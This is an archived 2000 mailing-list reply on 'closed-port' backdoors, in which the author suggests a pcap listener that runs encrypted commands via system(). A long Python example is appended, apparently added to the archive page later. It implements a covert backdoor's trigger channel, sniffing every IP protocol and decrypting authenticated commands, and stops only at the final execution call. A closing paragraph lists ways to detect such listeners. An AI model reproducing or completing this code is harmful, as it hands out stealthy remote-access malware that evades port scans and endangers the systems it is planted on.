Security Incidents mailing list archives

Re: "closed-port" backdoors


From: Mixter <mixter () 2XS CO IL>
Date: Wed, 23 Feb 2000 20:35:11 +0100

Fernando Cardoso wrote:

> Mixter's Q does the job quite nicely. The daemon can be activated via raw
> IP. You don't have to send any SYN packets. The drawback is that it only
> works on systems that can handle raw IP, so forget about Solaris and some
> flavours of BSD. I've tried it on Linux and it works very well.

If I'm not mistaken, Libnet API works pretty much everywhere, and it
wouldn't be a problem porting programs like Q or TFN from plain raw
sockets to Libnet API. Q/Q2 is usable, but more POC than application,
so I didn't make the effort to port it. If there are problems with
Libnet, one could at least use pcap on Solaris or BSD systems for a
passive-listening tool.

Also, there don't have to be obvious effects of a remote "raw" command,
such as opening a local port. Probably the simplest application would be
a message-decrypting pcap application that listens to all protocols and
just executes anything encrypted with the right key, using system()...


Mixter

------------------------------
 2XS Ltd. http://www.2xss.com
      mixter () 2xs co il
 http://mixter.warrior2k.com
  or http://mixter.void.ru
------------------------------
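The receive side of the "listen to all protocols, act only on a payload sealed with the right key" idea, written out as an added example for this archive page; it is not Mixter's Q/Q2 code nor anything from the thread. It assumes a trigger framing of nonce || ciphertext || tag (encrypt-then-MAC, with the stream cipher built from HMAC-SHA256 purely so it runs on the standard library), parses the transport payload out of an IPv4 packet whatever the protocol number, and returns the recovered command instead of passing it to system(). The packets it parses are constructed inline, so it runs offline without a raw or packet socket.

```python
import hashlib
import hmac
import os
import struct

# Added example (not Q/Q2): the per-packet logic of a "closed-port" trigger
# that sniffs every IP protocol and reacts only to a payload authenticated
# and encrypted under a shared key.  A real tool would feed this from a
# packet socket or pcap handle and call system() on the result; here the
# command is returned so the parsing and keying can be exercised offline.

PROTO_ICMP, PROTO_TCP, PROTO_UDP = 1, 6, 17
NONCE_LEN = 8
TAG_LEN = 16  # assumption: a truncated 128-bit HMAC-SHA256 tag


def _subkeys(key: bytes):
    """Derive separate encryption and MAC keys from the shared secret."""
    return (hashlib.sha256(b"enc" + key).digest(),
            hashlib.sha256(b"mac" + key).digest())


def _keystream_xor(enc_key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Counter-mode keystream from HMAC-SHA256 (illustrative PRF, stdlib only)."""
    out = bytearray()
    block = 0
    while len(out) < len(data):
        out += hmac.new(enc_key, nonce + struct.pack("!I", block), hashlib.sha256).digest()
        block += 1
    return bytes(a ^ b for a, b in zip(data, out))


def seal_command(key: bytes, command: str, nonce: bytes = None) -> bytes:
    """Sender side: nonce || ciphertext || tag, encrypt-then-MAC."""
    enc_key, mac_key = _subkeys(key)
    nonce = nonce or os.urandom(NONCE_LEN)
    ct = _keystream_xor(enc_key, nonce, command.encode())
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()[:TAG_LEN]
    return nonce + ct + tag


def open_command(key: bytes, blob: bytes):
    """Return the command if the tag verifies under key, otherwise None."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        return None
    enc_key, mac_key = _subkeys(key)
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expect = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, expect):
        return None
    try:
        return _keystream_xor(enc_key, nonce, ct).decode()
    except UnicodeDecodeError:
        return None


def transport_payload(packet: bytes):
    """Strip the IPv4 header and whichever transport header follows it."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None  # not IPv4
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    proto = packet[9]
    body = packet[ihl:total_len]
    if proto in (PROTO_ICMP, PROTO_UDP):
        return body[8:]  # 8-byte ICMP / UDP header
    if proto == PROTO_TCP:
        if len(body) < 20:
            return None
        return body[(body[12] >> 4) * 4:]  # data offset in 32-bit words
    return body  # any other protocol: payload follows the IP header directly


def build_packet(proto: int, payload: bytes) -> bytes:
    """Constructed IPv4 packet (checksums left zero; the receiver ignores them)."""
    if proto == PROTO_ICMP:
        l4 = struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1)  # echo request
    elif proto == PROTO_UDP:
        l4 = struct.pack("!HHHH", 53, 53, 8 + len(payload), 0)
    elif proto == PROTO_TCP:
        l4 = struct.pack("!HHIIBBHHH", 1234, 80, 0, 0, 5 << 4, 0x10, 0, 0, 0)  # bare ACK
    else:
        l4 = b""
    total = 20 + len(l4) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, proto, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return ip + l4 + payload


def extract_command(key: bytes, packet: bytes):
    """Per captured packet: parse, verify the key, hand back the command."""
    payload = transport_payload(packet)
    return open_command(key, payload) if payload else None


if __name__ == "__main__":
    key = b"shared-secret"
    for proto in (PROTO_ICMP, PROTO_UDP, PROTO_TCP, 47):
        pkt = build_packet(proto, seal_command(key, "id"))
        print(proto, extract_command(key, pkt))
```

Because the trigger can ride on an ICMP echo, a bare TCP ACK or an unrelated protocol number, a port scan and netstat show nothing, which is the whole point of the thread. What the listener cannot hide is the socket it reads from: on Linux a packet socket appears in /proc/net/packet, and if the interface was put into promiscuous mode the PROMISC flag shows in `ip link show`; those, plus a process holding libpcap open, are what a defender should look for instead of open ports.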

